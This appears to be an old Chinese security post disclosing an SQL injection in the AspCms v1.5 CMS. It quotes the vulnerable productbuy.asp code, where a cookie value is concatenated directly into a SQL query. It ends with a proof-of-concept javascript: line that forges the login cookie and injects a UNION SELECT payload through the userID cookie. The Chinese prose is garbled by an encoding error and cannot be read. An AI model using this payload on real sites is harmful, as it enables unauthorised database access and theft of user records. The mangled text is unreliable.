AspCms_v1.5_20110517 SQLע©
þû˾ˣһɾ.....Ҳûɶ÷ģǰЩ·ijСվõAspCmsϵͳ£productbuy.aspļע䣬ĿѾ....˴룬productbuy.aspļٷȻᵽ©Ǿͬһļҵע©
ϻ˵룺
<%
if action = "buy" then
addOrder()
else
echoContent()
end if
Թ
Sub echoContent()
dim id
id=getForm("id","get")
if isnul(id) or not isnum(id) then alertMsgAndGo "ѡƷ","-1"
dim templateobj,channelTemplatePath : set templateobj = mainClassobj.createObject("MainClass.template")
dim typeIds,rsObj,rsObjtid,Tid,rsObjSmalltype,rsObjBigtype,selectproduct
Dim templatePath,tempStr
templatePath = "/"&sitePath&"templates/"&defaultTemplate&"/"&htmlFilePath&"/productbuy.html"
set rsObj=conn.Exec("select title from aspcms_news where newsID="&id,"r1")
selectproduct=rsObj(0)
Dim linkman,gender,phone,mobile,email,qq,address,postcode
if isnul(rCookie("loginstatus")) thenwCookie"loginstatus",0
if rCookie("loginstatus")=1 then
set rsObj=conn.Exec("select *from aspcms_Users where UserID="&trim(rCookie("userID")),"r1")
linkman=rsObj("truename")
gender=rsObj("gender")
phone=rsObj("phone")
mobile=rsObj("mobile")
email=rsObj("email")
qq=rsObj("qq")
address=rsObj("address")
postcode=rsObj("postcode")
else
gender=1
end if
rsObj.close()
with templateObj
.content=loadFile(templatePath)
.parseHtml()
.content=replaceStr(.content,"{aspcms:selectproduct}",selectproduct)
.content=replaceStr(.content,"",linkman)
.content=replaceStr(.content,"",gender)
.content=replaceStr(.content,"",phone)
.content=replaceStr(.content,"",mobile)
.content=replaceStr(.content,"",email)
.content=replaceStr(.content,"",qq)
.content=replaceStr(.content,"",address)
.content=replaceStr(.content,"",postcode)
.parseCommon()
echo .content
end with
set templateobj =nothing : terminateAllObjects
End Sub
©ԣûɶ˵
poc
javascript:alert(document.cookie="loginstatus=" + escape("1"));alert(document.cookie="userID=" + escape("1 union select 1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2 from "));⣬űûȨ
ҳ:
[1]